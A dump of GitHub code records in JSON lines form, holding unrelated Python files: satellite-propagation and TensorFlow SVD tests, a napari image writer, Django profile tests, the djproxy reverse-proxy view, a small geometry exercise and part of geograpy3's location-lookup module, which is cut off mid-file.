test_Sgp4PropDs50UTC(self):\n\t\tsatKey = self.generic_satKey\n\t\tds50UTC = 25852.6\n\t\t(retcode, mse, pos, vel, llh) = sgp4dll.Sgp4PropDs50UTC(satKey, ds50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t##Sgp4PropDs50UtcLLH \n\tdef test_Sgp4PropDs50UtcLLH(self):\n\t\tsatKey = self.generic_satKey\n\t\tds50UTC = 25852.6\n\t\t(retcode, llh) = sgp4dll.Sgp4PropDs50UtcLLH(satKey, ds50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\n\t\n\t##Sgp4PropDs50UtcPos \n\tdef test_Sgp4PropDs50UtcPos(self):\n\t\tsatKey = self.generic_satKey\n\t\tds50UTC = 25852.6\n\t\t(retcode, pos) = sgp4dll.Sgp4PropDs50UtcPos(satKey, ds50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t##Sgp4PropMse\n\tdef test_Sgp4PropMse(self):\n\t\tsatKey = self.generic_satKey\n\t\tmse = 3600\n\t\t(retcode, ds50UTC, pos, vel, llh) = sgp4dll.Sgp4PropMse(satKey, mse)\n\t\tself.assertEqual(retcode, 0)\n\t\t# TODO: Add assertEquals for data from test case on blog\n\t\n\t##Sgp4ReepochTLE\n\tdef test_Sgp4ReepochTLE(self):\n\t\tsatKey = self.generic_satKey\n\t\treepochDs50UTC = 25852.6\n\t\t(retcode, line1Out, line2Out) = sgp4dll.Sgp4ReepochTLE(satKey, reepochDs50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\t# TODO: need real data\n\t\n\t##Sgp4RemoveAllSats\n\tdef test_Sgp4RemoveAllSats(self):\n\t\tretcode = sgp4dll.Sgp4RemoveAllSats()\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t##Sgp4RemoveSat\n\tdef test_Sgp4RemoveSat(self):\n\t\tsatKey = self.generic_satKey\n\t\tretcode = sgp4dll.Sgp4RemoveSat(satKey)\n\t\tself.assertEqual(retcode, 0)\n\t\t# TODO: verify satKey actually removed\n\t\n\t##Sgp4SetLicFilePath \n\n\n\tdef tearDown(self):\n\t\ttledll.TleRemoveAllSats()\n\t\treturn None\n","repo_name":"hardingprofessional/dshsaa","sub_path":"test/raw/test_sgp4dll.py","file_name":"test_sgp4dll.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30858411051","text":"# Tento usar o ingles para me ajudar, pois acredito ser bastante importante para o nosso ramo.\n# Também estou me acostumando a usar o type hints. Pois acredito ajudar na legibilidade e manutenibilidade do código.\nimport math\n\n\nnumber_of_tests: int = int(input())\n\n# Com o numero informado pude usar range e for para criar um lupe N vezes\nfor number_test in range(number_of_tests):\n # Coletei a quantidade de bolas sem ser a branca e declarei variaveis inportante para o próximo for\n available_balls: int = int(input())\n white_ball: int = 1\n x_white_ball: int = 0\n y_white_ball: int = 0\n # Esses valores são maiores do que o enunciado permite vir como input, logo sem serão substituidos pelo if a seguir\n closest_ball: int = 1000000\n distance_of_closest_ball: float = 1000000.0\n\n for number_ball in range(available_balls + white_ball):\n ball_coordenates: list = input().split()\n x_ball: int = int(ball_coordenates[0])\n y_ball: int = int(ball_coordenates[1])\n\n # Caso seja a primeira bola (bola branca, armazena os dados nas variaveis\n if number_ball == 0:\n x_white_ball = x_ball\n y_white_ball = y_ball\n else:\n # Caso não seja a bola branca, verifica a distancia que esta da bola branca por Pitagoras\n leg_x: int = x_white_ball - x_ball\n leg_y: int = y_white_ball - y_ball\n hypotenuse: float = math.sqrt((leg_x ** 2) + (leg_y ** 2))\n\n # Se estiver mais proximo que a bola anterior, armazena o valor da bola e a distancia\n is_closer: bool = hypotenuse < distance_of_closest_ball\n if is_closer:\n closest_ball = number_ball\n distance_of_closest_ball = hypotenuse\n\n print(closest_ball)\n","repo_name":"PabloVKF/programacaoo_orientada_a_objetos_I","sub_path":"prova_1/1554.py","file_name":"1554.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32344380414","text":"\"\"\"\nThis module is an example of a barebones writer plugin for napari.\n\nIt implements the Writer specification.\nsee: https://napari.org/plugins/stable/guides.html#writers\n\nReplace code below according to your needs.\n\"\"\"\nfrom __future__ import annotations\nfrom typing import TYPE_CHECKING, List, Any, Sequence, Tuple, Union\n\nimport itk\nfrom itk_napari_conversion import image_from_image_layer\nfrom pathlib import Path\nimport napari\n\nif TYPE_CHECKING:\n DataType = Union[Any, Sequence[Any]]\n FullLayerData = Tuple[DataType, dict, str]\n\n\ndef write_single(path: str, data: Any, meta: dict) -> List[str]:\n \"\"\"Writes a single layer\"\"\"\n pass\n\n\ndef write_multiple(path: str, data: List[FullLayerData]) -> List[str]:\n \"\"\"Writes multiple layers of different types.\"\"\"\n written_paths = []\n for i, image_layer_tuple in enumerate(data):\n image_layer = napari.layers.Image(image_layer_tuple[0], metadata=image_layer_tuple[1]['metadata'])\n image = image_from_image_layer(image_layer)\n\n if len(data) == 1:\n itk.imwrite(image, path)\n written_paths = [path]\n else:\n unique_path = Path(path)\n unique_path = str(Path(unique_path.parent) / (unique_path.stem + \"_\" + image_layer_tuple[1]['name'] + unique_path.suffix))\n itk.imwrite(image, unique_path)\n written_paths.append(unique_path)\n\n return written_paths \n","repo_name":"InsightSoftwareConsortium/napari-itk-io","sub_path":"src/napari_itk_io/_writer.py","file_name":"_writer.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"39795989850","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import linalg_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import test\n\n\nclass SvdOpTest(test.TestCase):\n\n def testWrongDimensions(self):\n # The input to svd should be a tensor of at least rank 2.\n scalar = constant_op.constant(1.)\n with self.assertRaisesRegexp(ValueError,\n \"Shape must be at least rank 2 but is rank 0\"):\n linalg_ops.svd(scalar)\n vector = constant_op.constant([1., 2.])\n with self.assertRaisesRegexp(ValueError,\n \"Shape must be at least rank 2 but is rank 1\"):\n linalg_ops.svd(vector)\n\n\ndef _GetSvdOpTest(dtype_, shape_, use_static_shape_):\n\n is_complex = dtype_ in (np.complex64, np.complex128)\n is_single = dtype_ in (np.float32, np.complex64)\n\n def CompareSingularValues(self, x, y):\n if is_single:\n tol = 5e-5\n else:\n tol = 1e-14\n self.assertAllClose(x, y, atol=(x[0] + y[0]) * tol)\n\n def CompareSingularVectors(self, x, y, rank):\n if is_single:\n atol = 5e-4\n else:\n atol = 5e-14\n # We only compare the first 'rank' singular vectors since the\n # remainder form an arbitrary orthonormal basis for the\n # (row- or column-) null space, whose exact value depends on\n # implementation details. Notice that since we check that the\n # matrices of singular vectors are unitary elsewhere, we do\n # implicitly test that the trailing vectors of x and y span the\n # same space.\n x = x[..., 0:rank]\n y = y[..., 0:rank]\n # Singular vectors are only unique up to sign (complex phase factor for\n # complex matrices), so we normalize the sign first.\n sum_of_ratios = np.sum(np.divide(y, x), -2, keepdims=True)\n phases = np.divide(sum_of_ratios, np.abs(sum_of_ratios))\n x *= phases\n self.assertAllClose(x, y, atol=atol)\n\n def CheckApproximation(self, a, u, s, v, full_matrices):\n if is_single:\n tol = 1e-5\n else:\n tol = 1e-14\n # Tests that a ~= u*diag(s)*transpose(v).\n batch_shape = a.shape[:-2]\n m = a.shape[-2]\n n = a.shape[-1]\n diag_s = math_ops.cast(array_ops.matrix_diag(s), dtype=dtype_)\n if full_matrices:\n if m > n:\n zeros = array_ops.zeros(batch_shape + (m - n, n), dtype=dtype_)\n diag_s = array_ops.concat([diag_s, zeros], a.ndim - 2)\n elif n > m:\n zeros = array_ops.zeros(batch_shape + (m, n - m), dtype=dtype_)\n diag_s = array_ops.concat([diag_s, zeros], a.ndim - 1)\n a_recon = math_ops.matmul(u, diag_s)\n a_recon = math_ops.matmul(a_recon, v, adjoint_b=True)\n self.assertAllClose(a_recon.eval(), a, rtol=tol, atol=tol)\n\n def CheckUnitary(self, x):\n # Tests that x[...,:,:]^H * x[...,:,:] is close to the identity.\n xx = math_ops.matmul(x, x, adjoint_a=True)\n identity = array_ops.matrix_band_part(array_ops.ones_like(xx), 0, 0)\n if is_single:\n tol = 1e-5\n else:\n tol = 1e-14\n self.assertAllClose(identity.eval(), xx.eval(), atol=tol)\n\n def Test(self):\n np.random.seed(1)\n x_np = np.random.uniform(\n low=-1.0, high=1.0, size=np.prod(shape_)).reshape(shape_).astype(dtype_)\n if is_complex:\n x_np += 1j * np.random.uniform(\n low=-1.0, high=1.0,\n size=np.prod(shape_)).reshape(shape_).astype(dtype_)\n\n for compute_uv in False, True:\n for full_matrices in False, True:\n with self.test_session() as sess:\n if use_static_shape_:\n x_tf = constant_op.constant(x_np)\n else:\n x_tf = array_ops.placeholder(dtype_)\n\n if compute_uv:\n s_tf, u_tf, v_tf = linalg_ops.svd(x_tf,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n if use_static_shape_:\n s_tf_val, u_tf_val, v_tf_val = sess.run([s_tf, u_tf, v_tf])\n else:\n s_tf_val, u_tf_val, v_tf_val = sess.run([s_tf, u_tf, v_tf],\n feed_dict={x_tf: x_np})\n else:\n s_tf = linalg_ops.svd(x_tf,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n if use_static_shape_:\n s_tf_val = sess.run(s_tf)\n else:\n s_tf_val = sess.run(s_tf, feed_dict={x_tf: x_np})\n\n if compute_uv:\n u_np, s_np, v_np = np.linalg.svd(x_np,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n else:\n s_np = np.linalg.svd(x_np,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n # We explicitly avoid the situation where numpy eliminates a first\n # dimension that is equal to one\n s_np = np.reshape(s_np, s_tf_val.shape)\n\n CompareSingularValues(self, s_np, s_tf_val)\n if compute_uv:\n CompareSingularVectors(self, u_np, u_tf_val, min(shape_[-2:]))\n CompareSingularVectors(self,\n np.conj(np.swapaxes(v_np, -2, -1)), v_tf_val,\n min(shape_[-2:]))\n CheckApproximation(self, x_np, u_tf_val, s_tf_val, v_tf_val,\n full_matrices)\n CheckUnitary(self, u_tf_val)\n CheckUnitary(self, v_tf_val)\n\n return Test\n\n\nif __name__ == \"__main__\":\n for dtype in np.float32, np.float64, np.complex64, np.complex128:\n for rows in 1, 2, 5, 10, 32, 100:\n for cols in 1, 2, 5, 10, 32, 100:\n for batch_dims in [(), (3,)] + [(3, 2)] * (max(rows, cols) < 10):\n shape = batch_dims + (rows, cols)\n for use_static_shape in True, False:\n name = \"%s_%s_%s\" % (dtype.__name__, \"_\".join(map(str, shape)),\n use_static_shape)\n setattr(SvdOpTest, \"testSvd_\" + name,\n _GetSvdOpTest(dtype, shape, use_static_shape))\n test.main()\n","repo_name":"baidu-research/tensorflow-allreduce","sub_path":"tensorflow/python/kernel_tests/svd_op_test.py","file_name":"svd_op_test.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"3"} +{"seq_id":"38170132166","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom .forms import EditUserProfile\nfrom .models import UserProfile\n\n\nclass ProfileModelTests(TestCase):\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username='testuser',\n email='test@email.com',\n password='secret'\n )\n\n def test_user_profile_string_representation(self):\n test_user = UserProfile.objects.get(user__username='testuser')\n self.assertEqual(str(test_user), 'testuser')\n\n def test_edit_user_profile_form(self):\n test_user = UserProfile.objects.get(user__username='testuser')\n form = EditUserProfile({\n 'user': test_user,\n 'default_phone_number': 'Test phone',\n 'default_street_address1': 'test address1',\n 'default_street_address2': 'test address2',\n 'default_town_or_city': 'test town',\n 'default_county': 'test county',\n 'default_postcode': 'Test post code',\n 'default_country': 'IE',\n })\n self.assertTrue(form.is_valid())\n","repo_name":"Bourkekev/ms4-power-fitness-gym","sub_path":"profiles/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72486021841","text":"\"\"\"HTTP Reverse Proxy class based generic view.\"\"\"\nfrom django import get_version as get_django_version\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom requests import request\nfrom six.moves.urllib.parse import urljoin\nfrom six import iteritems\n\nfrom .headers import HeaderDict\nfrom .proxy_middleware import MiddlewareSet\nfrom .request import DownstreamRequest\n\n\nclass HttpProxy(View):\n \"\"\"Reverse HTTP Proxy class-based generic view.\"\"\"\n\n base_url = None\n ignored_upstream_headers = [\n 'Content-Length', 'Content-Encoding', 'Keep-Alive', 'Connection',\n 'Transfer-Encoding', 'Host', 'Expect', 'Upgrade']\n ignored_request_headers = [\n 'Content-Length', 'Content-Encoding', 'Keep-Alive', 'Connection',\n 'Transfer-Encoding', 'Host', 'Expect', 'Upgrade']\n proxy_middleware = [\n 'djproxy.proxy_middleware.AddXFF',\n 'djproxy.proxy_middleware.AddXFH',\n 'djproxy.proxy_middleware.AddXFP',\n 'djproxy.proxy_middleware.ProxyPassReverse'\n ]\n pass_query_string = True\n reverse_urls = []\n verify_ssl = True\n cert = None\n timeout = None\n\n @property\n def proxy_url(self):\n \"\"\"Return URL to the resource to proxy.\"\"\"\n return urljoin(self.base_url, self.kwargs.get('url', ''))\n\n def _verify_config(self):\n assert self.base_url, 'base_url must be set to generate a proxy url'\n\n for rule in self.reverse_urls:\n assert len(rule) == 2, 'reverse_urls must be 2 string iterables'\n\n iter(self.ignored_upstream_headers)\n iter(self.ignored_request_headers)\n iter(self.proxy_middleware)\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Dispatch all HTTP methods to the proxy.\"\"\"\n self.request = DownstreamRequest(request)\n self.args = args\n self.kwargs = kwargs\n\n self._verify_config()\n\n self.middleware = MiddlewareSet(self.proxy_middleware)\n\n return self.proxy()\n\n def proxy(self):\n \"\"\"Retrieve the upstream content and build an HttpResponse.\"\"\"\n headers = self.request.headers.filter(self.ignored_request_headers)\n qs = self.request.query_string if self.pass_query_string else ''\n\n # Fix for django 1.10.0 bug https://code.djangoproject.com/ticket/27005\n if (self.request.META.get('CONTENT_LENGTH', None) == '' and\n get_django_version() == '1.10'):\n del self.request.META['CONTENT_LENGTH']\n\n request_kwargs = self.middleware.process_request(\n self, self.request, method=self.request.method, url=self.proxy_url,\n headers=headers, data=self.request.body, params=qs,\n allow_redirects=False, verify=self.verify_ssl, cert=self.cert,\n timeout=self.timeout)\n\n result = request(**request_kwargs)\n\n response = HttpResponse(result.content, status=result.status_code)\n\n # Attach forwardable headers to response\n forwardable_headers = HeaderDict(result.headers).filter(\n self.ignored_upstream_headers)\n for header, value in iteritems(forwardable_headers):\n response[header] = value\n\n return self.middleware.process_response(\n self, self.request, result, response)\n","repo_name":"thomasw/djproxy","sub_path":"djproxy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"3"} +{"seq_id":"8783219098","text":"'''\nThe locator module allows to get detailed city \ninformation including the region and country of a city from a \nlocation string.\n\nExamples for location strings are:\n\n Amsterdam, Netherlands\n Vienna, Austria\n Vienna, IL\n Paris - Texas\n Paris TX\n \nthe locator will lookup the cities and try to disambiguate the result based on the country or region information found.\n\nThe results in string representationa are:\n \n Amsterdam (NH(North Holland) - NL(Netherlands))\n Vienna (9(Vienna) - AT(Austria))\n Vienna (IL(Illinois) - US(United States))\n Paris (TX(Texas) - US(United States)) \n Paris (TX(Texas) - US(United States))\n \nEach city returned has a city.region and city.country attribute with the details of the city.\n \n\nCreated on 2020-09-18\n\n@author: wf\n'''\nimport os\nimport glob\nimport urllib\nimport re\nimport csv\nimport sys\nimport gzip\nimport shutil\nimport json\nfrom pathlib import Path\n\nfrom lodstorage.entity import EntityManager\nfrom lodstorage.storageconfig import StorageConfig, StoreMode\nfrom sklearn.neighbors import BallTree\nfrom geograpy.wikidata import Wikidata\nfrom lodstorage.sql import SQLDB\nfrom geograpy.utils import remove_non_ascii\nfrom geograpy import wikidata\nfrom argparse import ArgumentParser\nfrom argparse import RawDescriptionHelpFormatter\nfrom lodstorage.jsonable import JSONAble\nfrom math import radians, cos, sin, asin, sqrt\nfrom geograpy.utils import Profiler, Download\n\nclass LocationManager(EntityManager):\n '''\n a list of locations\n '''\n \n def __init__(self, name:str, entityName:str, entityPluralName:str, listName:str=None, tableName:str=None,clazz=None, primaryKey:str=None, config:StorageConfig=None, handleInvalidListTypes=True, filterInvalidListTypes=False, debug=False):\n '''\n construct me\n\n Args:\n name(string): name of this LocationManager\n entityName(string): entityType to be managed e.g. Country\n entityPluralName(string): plural of the the entityType e.g. Countries\n listName(str): the name of the list to hold\n tableName(str): the name of the table to use\n config(StorageConfig): the configuration to be used if None a default configuration will be used\n handleInvalidListTypes(bool): True if invalidListTypes should be converted or filtered\n filterInvalidListTypes(bool): True if invalidListTypes should be deleted\n debug(boolean): override debug setting when default of config is used via config=None\n '''\n if config is None:\n config=LocationContext.getDefaultConfig()\n super().__init__(name=name,\n entityName=entityName,\n entityPluralName=entityPluralName,\n listName=listName,\n clazz=clazz,\n tableName=tableName,\n primaryKey=primaryKey,\n config=config,\n handleInvalidListTypes=handleInvalidListTypes,\n filterInvalidListTypes=filterInvalidListTypes,\n debug=debug)\n self.balltree = None\n self.locationByWikidataID={}\n if config is not None and config.mode==StoreMode.SQL:\n self.sqldb=self.getSQLDB(config.cacheFile)\n\n def getBallTuple(self, cache:bool=True):\n '''\n get the BallTuple=BallTree,validList of this location list\n \n Args:\n cache(bool): if True calculate and use a cached version otherwise recalculate on\n every call of this function\n \n Returns:\n BallTree,list: a sklearn.neighbors.BallTree for the given list of locations, list: the valid list of locations\n list: valid list of locations\n '''\n validList = []\n if self.balltree is None or not cache:\n coordinatesrad = []\n for location in self.getList():\n if location.lat and location.lon:\n latlonrad = (radians(location.lat), radians(location.lon))\n coordinatesrad.append(latlonrad)\n validList.append(location)\n self.ballTuple = BallTree(coordinatesrad, metric='haversine'), validList\n return self.ballTuple\n \n def fromCache(self,force=False,getListOfDicts=None,sampleRecordCount=-1):\n '''\n get me from the cache\n '''\n super().fromCache(force, getListOfDicts, sampleRecordCount)\n self.locationByWikidataID={}\n for entry in self.getList():\n self.locationByWikidataID[entry.wikidataid]=entry\n\n def getLocationByID(self, wikidataID:str):\n '''\n Returns the location object that corresponds to the given location\n\n Args:\n wikidataID: wikidataid of the location that should be returned\n\n Returns:\n Location object\n '''\n location=None\n if wikidataID in self.locationByWikidataID:\n location=self.locationByWikidataID[wikidataID]\n return location\n \n def add(self,location):\n '''\n add the given location to me \n \n Args:\n location(object): the location to be added and put in my hash map\n '''\n self.getList().append(location)\n if hasattr(location,\"wikidataid\"):\n self.locationByWikidataID[location.wikidataid]=location\n\n \n @staticmethod\n def getBackupDirectory():\n path = str(Path(Path.home(), \".geograpy3\"))\n return path\n \n @classmethod\n def downloadBackupFileFromGitHub(cls,fileName:str, targetDirectory:str=None, force:bool=False):\n '''\n download the given fileName from the github data directory\n \n Args:\n fileName(str): the filename to download\n targetDirectory(str): download the file this directory\n force(bool): force the overwriting of the existent file\n \n Return:\n str: the local file\n '''\n # Data is downloaded from the github wiki - to modify the data clone the wiki\n # as documented in https://github.com/somnathrakshit/geograpy3/wiki\n # git clone https://github.com/somnathrakshit/geograpy3.wiki.git\n url = f\"https://raw.githubusercontent.com/wiki/somnathrakshit/geograpy3/data/{fileName}.gz\"\n if targetDirectory is None:\n targetDirectory=LocationManager.getBackupDirectory()\n backupFile = Download.downloadBackupFile(url, fileName, targetDirectory, force)\n return backupFile\n\n def getByName(self, *names:str):\n '''\n Get locations matching given names\n Args:\n name: Name of the location\n\n Returns:\n Returns locations that match the given name\n '''\n query = f\"SELECT * FROM {self.clazz.__name__}Lookup WHERE label IN ({','.join('?'*len(names))})\"\n sqldb=self.getSQLDB(self.config.cacheFile)\n locationRecords = sqldb.query(query, params=tuple(names))\n locations=self._locationsFromLookup(*locationRecords)\n return locations\n\n def getLocationsByWikidataId(self, *wikidataId:str):\n '''\n Returns Location objects for the given wikidataids\n Args:\n *wikidataId(str): wikidataIds of the locations that should be returned\n\n Returns:\n Location objects matching the given wikidataids\n '''\n wikidataIds=set(wikidataId)\n if wikidataIds is None or not wikidataIds:\n return\n query=f\"SELECT * FROM {self.clazz.__name__}Lookup WHERE wikidataid IN ({','.join('?'*len(wikidataIds))})\"\n sqldb = self.getSQLDB(self.config.cacheFile)\n locationRecords=sqldb.query(query, params=tuple(list(wikidataIds)))\n if locationRecords:\n locations=self._locationsFromLookup(*locationRecords)\n return locations\n else:\n if self.debug:\n print(\"No Records matching the given wikidataIds found.\")\n return\n\n def _locationsFromLookup(self, *locationRecords:dict):\n '''\n Convert given lookup records to the corresponding location objects\n Args:\n *locationRecords: lookup records of locations\n\n Returns:\n List of Location objects based on the given records\n '''\n if self.clazz is City:\n locations=[City.fromCityLookup(record) for record in locationRecords]\n elif self.clazz is Region:\n locations = [Region.fromRegionLookup(record) for record in locationRecords]\n elif self.clazz is Country:\n locations = [Country.fromCountryLookup(record) for record in locationRecords]\n else:\n locations=[self.clazz.fromRecord(lr) for lr in locationRecords]\n return locations\n\n def getLocationByIsoCode(self, isoCode:str):\n '''\n Get possible locations matching the given isoCode\n Args:\n isoCode: isoCode of possible Locations\n\n Returns:\n List of wikidata ids of locations matching the given isoCode\n '''\n if isinstance(self, RegionManager) or isinstance(self, CountryManager):\n if isinstance(self, RegionManager):\n query = f\"SELECT wikidataid FROM {self.tableName} WHERE iso LIKE (?) OR iso LIKE (?)\"\n params = (f\"%-{isoCode}\", isoCode,)\n else:\n query = f\"SELECT wikidataid FROM {self.tableName} WHERE iso LIKE (?)\"\n params = (isoCode,)\n sqldb = self.getSQLDB(self.config.cacheFile)\n qres = sqldb.query(query, params)\n locationIds = [record['wikidataid'] for record in qres if 'wikidataid' in record]\n return locationIds\n else:\n return []\n\nclass CountryManager(LocationManager):\n '''\n a list of countries\n '''\n \n def __init__(self, name:str=\"CountryManager\", config:StorageConfig=None, debug=False):\n super().__init__(name=name,\n entityName=\"country\",\n entityPluralName=\"countries\",\n clazz=Country,\n primaryKey=\"wikidataid\",\n tableName=\"countries\",\n config=config,\n debug=debug\n )\n self.wd=Wikidata()\n self.getListOfDicts=self.wd.getCountries\n\n @classmethod\n def fromErdem(cls):\n '''\n get country list provided by Erdem Ozkol https://github.com/erdem\n '''\n countryManager = CountryManager(name=\"countries_erdem\")\n countryJsonUrl = \"https://gist.githubusercontent.com/erdem/8c7d26765831d0f9a8c62f02782ae00d/raw/248037cd701af0a4957cce340dabb0fd04e38f4c/countries.json\"\n with urllib.request.urlopen(countryJsonUrl) as url:\n jsonCountryList = json.loads(url.read().decode())\n for jsonCountry in jsonCountryList:\n country = Country()\n country.name = jsonCountry['name']\n country.iso = jsonCountry['country_code']\n country.lat = jsonCountry['latlng'][0]\n country.lon = jsonCountry['latlng'][1]\n countryManager.add(country)\n\n return countryManager\n\n\nclass RegionManager(LocationManager):\n '''\n a list of regions\n '''\n\n def __init__(self, name:str=\"RegionManager\", config:StorageConfig=None,debug=False):\n super().__init__(name=name,\n entityName=\"region\",\n entityPluralName=\"regions\",\n clazz=Region,\n primaryKey=\"regionId\",\n tableName=\"regions\",\n config=config,\n debug=debug\n )\n self.wd=Wikidata()\n def _queryRegions(**kwargs):\n return [*self.wd.getRegions(**kwargs), *self.wd.getCityStates(**kwargs)]\n self.getListOfDicts=_queryRegions\n\n\nclass CityManager(LocationManager):\n '''\n a list of cities\n '''\n\n def __init__(self, name:str=\"CityManager\",config:StorageConfig=None,debug=False):\n super().__init__(name=name,\n entityName=\"city\",\n entityPluralName=\"cities\",\n clazz=City,\n primaryKey=None,\n tableName=\"cities\",\n config=config,\n debug=debug\n )\n self.wd=Wikidata()\n self.getListOfDicts=self.wd.getCities\n \n @classmethod \n def getJsonFiles(cls,config:StorageConfig) -> list: \n '''\n get the list of the json files that have my data\n \n Return:\n list: a list of json file names\n \n '''\n jsondir=f\"{config.getCachePath()}/regions\"\n if not os.path.exists(jsondir):\n os.makedirs(jsondir)\n jsonFiles = sorted(glob.glob(f\"{jsondir}/*.json\"), key=lambda path:int(re.findall(r'\\d+', path)[0]))\n return jsonFiles\n \n \nclass Earth:\n radius = 6371.000 # radius of earth in km\n\n\nclass Location(JSONAble):\n '''\n Represents a Location\n '''\n\n def __init__(self, **kwargs):\n for key in kwargs.keys():\n setattr(self, key, kwargs[key])\n \n @classmethod\n def getSamples(cls):\n samplesLOD = [{\n \"name\": \"Los Angeles\",\n \"wikidataid\": \"Q65\",\n \"lat\": 34.05223,\n \"lon\":-118.24368,\n \"partOf\": \"US/CA\",\n \"level\": 5,\n \"locationKind\": \"City\",\n \"comment\": None,\n \"population\": 3976322\n }]\n return samplesLOD\n\n @staticmethod\n def haversine(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees)\n \"\"\"\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n \n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a)) \n return c * Earth.radius\n\n def getNClosestLocations(self, lookupLocationManager, n:int):\n \"\"\"\n Gives a list of up to n locations which have the shortest distance to \n me as calculated from the given listOfLocations\n \n Args:\n lookupLocationManager(LocationManager): a LocationManager object to use for lookup\n n(int): the maximum number of closest locations to return \n \n Returns:\n list: a list of result Location/distance tuples\n \"\"\"\n balltree, lookupListOfLocations = lookupLocationManager.getBallTuple()\n # check for n+1 entries since we might have my own record in the lookup list which we'll ignore late\n distances, indices = balltree.query([[radians(self.lat), radians(self.lon)]], k=n + 1, return_distance=True)\n resultLocations = self.balltreeQueryResultToLocationManager(distances[0], indices[0], lookupListOfLocations)\n return resultLocations\n \n def getLocationsWithinRadius(self, lookupLocationManager, radiusKm:float):\n \"\"\"\n Gives the n closest locations to me from the given lookupListOfLocations\n \n Args:\n lookupLocationManager(LocationManager): a LocationManager object to use for lookup\n radiusKm(float): the radius in which to check (in km)\n \n Returns:\n list: a list of result Location/distance tuples\n \"\"\"\n balltree, lookupListOfLocations = lookupLocationManager.getBallTuple()\n \n indices, distances = balltree.query_radius([[radians(self.lat), radians(self.lon)]], r=radiusKm / Earth.radius,\n return_distance=True)\n locationList = self.balltreeQueryResultToLocationManager(distances[0], indices[0], lookupListOfLocations)\n return locationList\n \n def balltreeQueryResultToLocationManager(self, distances, indices, lookupListOfLocations):\n '''\n convert the given ballTree Query Result to a LocationManager\n \n Args:\n distances(list): array of distances\n indices(list): array of indices\n lookupListOfLocations(list): a list of valid locations to use for lookup\n \n Return:\n list: a list of result Location/distance tuples\n '''\n locationListWithDistance = []\n for i, locationIndex in enumerate(indices):\n distance = distances[i] * Earth.radius \n location = lookupListOfLocations[locationIndex]\n # do not add myself or any other equivalent location\n if not distance < 0.0001:\n locationListWithDistance.append((location, distance))\n # sort by distance (Ball tree only does this for one of the queries ...) \n locationListWithDistance = sorted(locationListWithDistance, key=lambda lwd: lwd[1])\n return locationListWithDistance\n\n def distance(self, other) -> float:\n '''\n calculate the distance to another Location\n \n Args:\n other(Location): the other location\n \n Returns:\n the haversine distance in km\n '''\n # see https://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points\n distance = Location.haversine(self.lon, self.lat, other.lon, other.lat)\n return distance\n\n def isKnownAs(self, name) -> bool:\n '''\n Checks if this location is known under the given name\n\n Args:\n name(str): name the location should be checked against\n\n Returns:\n True if the given name is either the name of the location or present in the labels of the location\n '''\n isKnown = False\n if hasattr(self, 'labels'):\n if name in self.labels:\n isKnown = True\n if hasattr(self, 'name'):\n if name == self.name:\n isKnown = True\n return isKnown\n\n @staticmethod\n def partialDict(record, clazz, keys=None):\n if keys is None:\n keys = clazz.getSamples()[0].keys()\n pDict = {k: v for k, v in record.items() if k in keys}\n return pDict\n\n @staticmethod\n def mappedDict(record, keyMapList: list):\n keyMap = {}\n for mkey, mValue in keyMapList:\n keyMap[mkey] = mValue\n pDict = {keyMap[k]: v for k, v in record.items() if k in keyMap.keys()}\n return pDict\n\n @classmethod\n def fromRecord(cls,regionRecord: dict):\n '''\n create a location from a dict record\n\n Args:\n regionRecord(dict): the records as returned from a Query\n\n Returns:\n Region: the corresponding region information\n '''\n location=cls()\n location.fromDict(regionRecord)\n return location\n\n \nclass City(Location):\n '''\n a single city as an object\n '''\n\n def __init__(self, **kwargs):\n super(City, self).__init__(**kwargs)\n if not hasattr(self, 'level'):\n setattr(self, 'level', 5)\n if not hasattr(self, 'locationKind'):\n setattr(self, 'locationKind', \"City\")\n self._country = None\n self._region = None\n\n @classmethod\n def getSamples(cls):\n samplesLOD = [{\n \"name\": \"Los Angeles\",\n \"wikidataid\": \"Q65\",\n \"lat\": 34.05223,\n \"lon\":-118.24368,\n \"geoNameId\": \"5368361\",\n \"gndId\": \"4036361-2\",\n \"partOf\": \"US/CA\",\n \"level\": 5,\n \"locationKind\": \"City\",\n \"pop\": \"3976322\",\n \"regionId\": \"Q99\",\n \"countryId\": \"Q30\"\n }]\n return samplesLOD\n \n def __str__(self):\n 